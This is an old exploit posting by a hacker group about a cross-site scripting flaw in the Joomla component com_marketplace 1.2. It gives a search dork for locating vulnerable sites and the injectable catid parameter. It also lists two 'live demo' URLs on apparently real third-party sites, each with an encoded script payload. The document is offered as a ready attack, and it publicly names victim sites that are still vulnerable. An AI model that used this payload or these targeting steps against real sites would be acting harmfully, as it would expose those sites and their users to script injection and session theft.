Joomla Marketplace 1.2 Cross Site Scripting

`  
  
==============================================================================  
__ __ __ __ __ __  
/ \ / \ \ \ / / / \ / \  
/ /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \  
/ / \ _ / \ \ \ \/ / / / \ _ / \ \  
/_/ \_\ \__/ /_/ \_\  
  
==============================================================================  
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]  
==============================================================================  
[»] Joomla Component com_marketplace v1.2 [xss] Cross Site Scripting Vulnerability  
==============================================================================  
  
[»] Script: [ com_marketplace ]  
[»] Dork: [ Marketplace Version 1.2 (c) 2005-2006 joomster.com ]  
[»] Language: [ PHP ]  
[»] Founder: [ ViRuSMaN <[email protected] - [email protected]> ]  
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]  
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]  
  
###########################################################################  
  
===[ Exploit ]===  
  
[»] http://[target].com/[path]/index.php?option=com_marketplace&page=show_category&catid=[Xss Vuln]  
  
  
  
===[ Live Demo ]===  
  
[»] http://regiofirmen.de/joomla/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
[»] http://andrychow.info/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
  
  
Author: ViRuSMaN <-  
  
###########################################################################  
________________________________  
Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail®.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009>  
  
  
  
`